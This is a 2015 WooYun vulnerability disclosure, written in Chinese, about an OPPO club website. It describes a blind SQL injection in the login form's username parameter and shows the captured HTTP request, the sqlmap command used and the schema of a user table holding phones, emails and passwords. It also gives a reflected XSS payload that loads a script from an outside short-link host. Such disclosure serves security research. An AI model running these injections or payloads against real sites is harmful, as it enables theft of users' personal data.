当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-096043

漏洞标题:OPPO某站SQL注入导致用户信息泄露(手机号邮箱账号密码)

相关厂商:广东欧珀移动通讯有限公司

漏洞作者: 千斤拨四两

提交时间:2015-02-10 12:07

修复时间:2015-02-15 12:08

公开时间:2015-02-15 12:08

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-10: 细节已通知厂商并且等待厂商处理中
2015-02-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

存在sql注入点和反射xss

详细说明:

username参数存在post注入,在登陆框随便提交数据抓取数据包如下:
<code>
POST /club_login.php HTTP/1.1
Host: www.oppodigital.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.oppodigital.com.cn/club_login.php
Cookie: pgv_pvi=7487544320; __utma=42439803.2032898508.1423192596.1423192596.1423201653.2; __utmz=42439803.1423192596.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3qdpr4hg9eqpam1rp4grvum5h1; pgv_si=s2809327616; __utmb=42439803.2.10.1423201653; __utmc=42439803
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 63
username=admin&password=admin&act=club&login=%E7%99%BB%E5%BD%95


http://www.oppodigital.com.cn//showroom.php?act=get_store&sell_district_id=1


sqlmap跑,盲注。

漏洞证明:

oppo.png


注入代码sqlmap.py -r 注入的数据包 -p username --dbs --level 3

mm.png


Database: oppo_store
Table: bd_club_user
[24 columns]
+-------------------+------------------+
| Column | Type |
+-------------------+------------------+
| address | varchar(512) |
| birthday | datetime |
| city | varchar(128) |
| connection_type | varchar(512) |
| dateline | int(10) unsigned |
| e_mail | varchar(512) |
| education | varchar(128) |
| marriage_status | char(1) |
| media | varchar(512) |
| mobile_phone | varchar(32) |
| password | varchar(64) |
| personal_income | varchar(128) |
| profession | varchar(128) |
| province | varchar(128) |
| purchase_reason | varchar(512) |
| recommended_email | varchar(512) |
| sex | char(1) |
| status | char(1) |
| tel_phone | varchar(32) |
| true_name | varchar(128) |
| type | varchar(512) |
| u_id | int(10) unsigned |
| user_name | varchar(128) |
| zipcode | varchar(16) |
+-------------------+------------------+


shuji .png


http://www.oppodigital.com.cn/club_login.php


post提交数据
act=club&login=%e7%99%bb%e5%bd%95&password=acUn3t1x&username="/><script src=http://t.cn/RwzPqom></script>

xss.png


xssss.png


修复方案:

过滤...

版权声明:转载请注明来源 千斤拨四两@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-02-15 12:08

厂商回复:

最新状态:

暂无


漏洞评价:

评论